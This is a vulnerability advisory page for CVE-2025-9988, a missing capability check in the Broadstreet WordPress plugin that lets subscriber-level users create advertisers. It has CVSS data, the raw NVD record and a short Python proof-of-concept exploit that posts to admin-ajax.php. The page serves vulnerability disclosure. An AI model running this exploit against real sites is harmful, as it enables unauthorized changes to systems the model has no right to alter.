Security Vulnerability Report
中文
CVE-2025-9988 CVSS 4.3 MEDIUM

CVE-2025-9988

Published: 2026-05-13 05:16:14
Last Modified: 2026-05-13 14:43:47

Description

The Broadstreet plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the create_advertiser AJAX action in all versions up to, and including, 1.53.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create advertisers.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Broadstreet WordPress Plugin <= 1.53.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # Credentials for a low-privileged user (Subscriber) username = "subscriber" password = "password" # 1. Authenticate and get cookies login_url = "http://example.com/wp-login.php" session = requests.Session() session.post(login_url, data={'log': username, 'pwd': password}) # 2. Prepare payload to exploit the missing capability check payload = { 'action': 'create_advertiser', # The vulnerable AJAX action 'name': 'Malicious Advertiser', 'email': '[email protected]' } # 3. Send the request response = session.post(target_url, data=payload) # Check if exploitation was successful if response.status_code == 200: print("POC Successful: Advertiser created.") else: print("POC Failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9988", "sourceIdentifier": "[email protected]", "published": "2026-05-13T05:16:13.607", "lastModified": "2026-05-13T14:43:46.717", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Broadstreet plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the create_advertiser AJAX action in all versions up to, and including, 1.53.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create advertisers."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3524817", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/480ab377-b979-4e1c-9c7a-cf63d69ad697?source=cve", "source": "[email protected]"}]}}